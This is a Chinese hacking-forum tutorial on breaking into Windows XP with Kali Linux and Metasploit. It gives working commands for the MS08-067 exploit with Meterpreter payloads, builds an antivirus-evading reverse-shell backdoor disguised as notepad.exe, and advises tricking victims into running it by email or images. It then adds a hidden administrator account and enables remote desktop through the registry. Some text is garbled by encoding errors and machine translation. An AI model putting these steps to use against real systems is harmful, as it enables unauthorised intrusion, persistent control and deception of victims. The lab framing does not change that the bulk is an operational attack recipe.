Kali Linux 入侵windows实例-Kali Linux社区-电脑端-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网

Kali Linux 入侵windows实例

image

 

Kali Linux 入侵窗口实例
01
我使用Kali Linux的IP地址192.168.0.112。
02
在同一局域网内有一台运行Windows XP
(192.168.0.108)的测试电脑。
03

本文演示怎样正确的使用Metasploit入侵

windowsXP SP3。

 

1 启动 msfconsole:
    1. # msfconsole

     

2
选择一个漏洞:
  1. msf > search platform: windows xp sp3

 

 

3
查看某个漏洞的详细信息
包含使用方法、支持的平台等等,非常有帮助:
  1. exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。

 

 

4
依次执行如下命令:
  •  
  1. msf > use exploit/windows/smb/ms08_067_netapi> set payload windows/meterpreter/bind_tcp> set RHOST 192.168.0.108 (设置目标主机IP地址)> exploit

复制代码

 

5
若主机有这个·漏洞可控制,否则尝试其他漏洞
  1. <li>Started bind handler</li><li> Automatically detecting the target…</li><li> Fingerprint: Windows XP SP3 – Service Pack 3 – lang:Chinese</li><li> Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)</li><li> Attempting to trigger the vulnerability…</li><li> Sending stage (751104 bytes) to 192.168.0.108</li><li> Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32meterpreter ></li>

复制代码

6
结果
现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。

 

演示使用后程序侵入Windows
1
创建:

原理:在Kali Linux上生成后门程序,把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙。

生成后门程序:

我把后门程序隐藏到记事本程序中:notepad.exe

查看Kali Linux的IP:ifconfig(192.168.0.112)

创建后门程序,my_backdoor.exe:

  •  
  1. # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe

复制代码

 

2
启动:

上面命令使用加密试图躲过杀毒软件,但是,不要期望它可以生效。使用man msfvenom查看帮助。

把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。

启动 msfconsole:

  1.  
  2. # msfconsole
  3.  
  4. use exploit/multi/handler
  5. set LHOST 192.168.0.112
  6. set LPORT 4445
  7. set payload windows/meterpreter/reverse_tcp
  8. show options
  9. exploit

复制代码

 

3
等待受害者启动后门程序。

 

4
好的,入侵成功。
1
入侵Windows服务器的流程
Windows服务器系统包括一个全面、集成的基础结构,旨在满足开发人员和信息技术(IT)专业人员的要求。此系统设计用于运行特定的程序和解决方案借助这些程序和解决方案,信息工作人员可以快速便捷地获取、分析和共享信息。入侵者对Windows服务器系统的攻击主要是针对IIS服务器和组网协议的攻击。

image

 

2
实验环境

image

 

3
试验工具

 

Kaili Linux 百度百科
其预装了许多试验工具,包括nmap 、Wireshark 、John the Ripper ,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。

 

Metasploit 百度百
科Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

 

知识点综述
01
熟悉虚拟机vmware的相关知识,因为本环境是
在VM中进行的,需安装kaili linux和windows
xp,以及设计虚拟机网络,其可以参考文章:
VMware14.0知识点手册.
02
计算机网络相关知识点。
03
VMware的虚拟网络

 

1
与物理交换机相似,虚拟交换机也能将网络连接组件连接在一起。虚拟交换机又称为虚拟网络,其名称为VMnet0、VMnet1、VMnet2,以此类推。有少量虚拟交换机会默认映射到特定网络。

 

2
选择虚拟网络适配器类型

image

 

虚拟网络机见上

image

 

虚拟网络交换机见上

image

 

桥接模式网络连接见上

image

 

NAT配置

image

 

主机模式

 

3
IP地址

IP(这里是ipv4)地址分类,网络类型。

ip地址,由《net-id,host-id》二部分组成。根据网络号的位数,把ip划分为A,B,C,D,E几大类,其中A类(0,127),B类(128,191),C类(192,223)

 

4
VMWare虚拟机的桥接、nat和主机模式区别

所以本次试验的虚拟机网络采用桥接方式,所以主要介绍下桥接。
bridged(桥接模式)
在这种模式下,VMWare虚拟出来的操作系统就像是局域网中的一台独立的主机,它可以访问网内任何一台机器。
在桥接模式下,因为是独立的主机系统,那么就需要为虚拟系统配置IP、掩子网码。
使用桥接模式的虚拟系统和宿主机器的关系,就像连接在同一个Hub上的两台电脑。想让它们相互通讯,你就需要为虚拟系统配置IP地址和子网掩码,否则就无法通信。而且还要和宿主机器处于同一网段,这样虚拟系统才能和宿主机器进行通信。

 

重要细节
1
因为在vmware模拟kaili入侵Windows XP所以要保证这二台虚拟机可以通信,试验的vmware采用桥接网络,二台虚拟机相当于独立的主机,在vmware想要通信,必须处于同一网段(就是网络号要一样),二台主机设置kaili设置为192.168.201.133,Windows XP设置为192.168.201.135,它们是C类ip,前3位是网络号,都是192.168.201相同,可以通信,可以采用ping命令进行。

 

2
为了试验效果明显,最好关闭掉windows的防火墙,这样入侵更容易,而且自己原本的主机把杀毒软件也关闭了。

 

入侵开始
1
查看Linux的IP地址:
root@kali:~# ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.201.133  netmask 255.255.255.0  broadcast 192.168.201.255
        inet6 fe80::20c:29ff:fecc:87cf  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:cc:87:cf  txqueuelen 1000  (Ethernet)
        RX packets 30  bytes 2530 (2.4 KiB)
        RX errors 0  dropped 5  overruns 0  frame 0
        TX packets 51  bytes 3303 (3.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 52  bytes 3756 (3.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 52  bytes 3756 (3.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

 

 

2
ping命令,测试Linux和Windows是否可以通信
root@kali:~# ping -c 2 192.168.201.135PING 192.168.201.135 (192.168.201.135) 56(84) bytes of data.64 bytes from 192.168.201.135: icmp_seq=1 ttl=128 time=13.5 ms64 bytes from 192.168.201.135: icmp_seq=2 ttl=128 time=0.395 ms--- 192.168.201.135 ping statistics ---2 packets transmitted, 2 received, 0% packet loss, time 1002msrtt min/avg/max/mdev = 0.395/6.986/13.578/6.592 ms

linux的ping和windows有所不同,如果不设置次数会一直ping下去。

root@kali:~# ping
Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 ...] destination

 

3
开启SQL数据库服务
root@kali:~# service postgresql start

 

 

4
终端执行msfconsole 命令
root@kali:~# msfconsole 
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.16.6-dev                         ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

使用help命令查看其参数和用法

msf > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    irb           Drop into irb scripting mode
    load          Load a framework plugin
    quit          Exit the console
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands
===============

    Command       Description
 -----------------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    edit          Edit the current module with the preferred editor
    info          Displays information about one or more modules
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Selects a module by name

Job Commands
============

    Command       Description
------- -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job
Resource Script Commands
========================
    Command       Description
 ------------------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file

Database Backend Commands
=========================
    Command           Descr
---- -----------
    db_connect        Connect to an existing database
    db_disconnect     Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache
    db_status         Show the current database status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Credentials Backend Commands
============================

    Command       Description
  ------ -----------
    creds         List all credentials in the database

5.运行search netapi命令搜索netapi,在metasploip框架中列出所有与netapi相关的漏洞利用代码

msf > search  netapi
Matching Modules================
   Name                                 Disclosure Date  Rank    Description----------------------------------   exploit/windows/smb/ms03_049_netapi  2003-11-11       good    MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow   exploit/windows/smb/ms06_040_netapi  2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow   exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow   exploit/windows/smb/ms08_067_netapi  2008-10-28       great   MS08-067 Microsoft Server Service Relative Path Stack Corruption

6.用use exploit/windows/smb/ms08_067_netapi 设参数

msf > use exploit/windows/smb/ms08_067_netapi 

msf exploit(ms08_067_netapi) > set rhost 192.168.201.135
rhost => 192.168.201.135
msf exploit(ms08_067_netapi) > check
[+] 192.168.201.135:445 The target is vulnerable.
msf exploit(ms08_067_netapi) > set lhost 192.168.201.133
lhost => 192.168.201.133
msf exploit(ms08_067_netapi) > set target 34
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports 
payload => windows/meterpreter/reverse_tcp_allports

msf exploit(ms08_067_netapi) > exploit 
[*] Started reverse TCP handler on 192.168.201.133:1 
[*] 192.168.201.135:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 192.168.201.135
[*] Meterpreter session 1 opened (192.168.201.133:1 -> 192.168.201.135:1031) at 2017-10-27 23:03:20 +0800

7.输入shell,获取受控zhuji的shel,我这里是Windows的dos。

meterpreter > shell
Process 1968 created.
Channel 1 created.
Microsoft Windows XP [锟芥本 5.1.2600]
(C) 锟斤拷权锟斤拷锟斤拷 1985-2001 Microsoft Corp.C:\WINDOWS\system32>net user ztg 123456 /add
net user ztg 123456 /add
锟绞伙拷锟窖撅拷锟斤拷锟节★拷

锟斤拷锟斤拷锟斤拷 NET HELPMSG 2224 锟皆伙拷锟矫革拷锟斤拷锟侥帮拷锟斤拷锟斤拷C:\WINDOWS\system32>net localgroup administrators ztg /add
net localgroup administrators ztg /add
锟斤拷锟斤拷系统锟斤拷锟斤拷 1378锟斤拷

锟斤拷锟斤拷锟绞伙拷锟斤拷锟斤拷锟角憋拷锟斤拷锟斤拷锟侥筹拷员锟斤拷C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

锟斤拷锟斤拷锟缴癸拷锟斤拷锟斤拷C:\WINDOWS\system32>netstat -an 
netstat -an 

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.201.135:139    0.0.0.0:0              LISTENING
  TCP    192.168.201.135:1031   192.168.201.133:1      ESTABLISHED
  UDP    0.0.0.0:445            *:*                    
  UDP    0.0.0.0:500            *:*                    
  UDP    0.0.0.0:4500           *:*                    
  UDP    127.0.0.1:123          *:*                    
  UDP    127.0.0.1:1025         *:*                    
  UDP    127.0.0.1:1900         *:*                    
  UDP    192.168.201.135:123    *:*                    
  UDP    192.168.201.135:137    *:*                    
  UDP    192.168.201.135:138    *:*                    
  UDP    192.168.201.135:1900   *:*                    C:\WINDOWS\system32>ipconfig -all
ipconfig -all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : dflx
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter 锟斤拷锟斤拷锟斤拷锟斤拷:

        Connection-specific DNS Suffix  . : 
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-0C-29-04-23-53
        Dhcp Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 192.168.201.135
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . :

 

 

     
进入Windows界面,dos大神可以畅通无阻了,不过如果喜欢windows界面,可以安装上面的方法,进行操作,在远程桌面。
net user ztg 123456 /add

 

  

添加一个用户名为ztg,密码123456
C:\WINDOWS\system32>net localgroup administrators ztg /add
net localgroup administrators ztg /add

 

 

把ztg添加到管理员用户组
C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections

 

 

安装

蟒蛇 --版本

安装git

apt-get install git

然后便开始安装

须藤苏

git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin

chmod +x /usr/bin/katoolin #给予权限

须藤卡图林 #打开katoolin

 

image

 

2
之后输入
01
查看软件库
02
查看软件分类
03
安装经典菜单通知
04
安装卡利菜单

 

我们先输入1查看软件库

image

 

再输入1添加软件源完成后输入2更新源,输入back返回上级或gohome返回主页
接下来在主界面选择2 查看类别

image

 

      输入对应数字查看软件列表并安装,或者直接输入0安装全部工具。
后面主界面的3和4用来安装菜单这里不做过多介绍。
      另外注意 执行apt-get update前必须先在katoolin内删除软件源
这样很简单便安装了kali的全部工具集,是不是很方便呢。
      最后提醒大家一句,请勿将该工具用于任何非法目的!
请登录后发表评论

    没有回复内容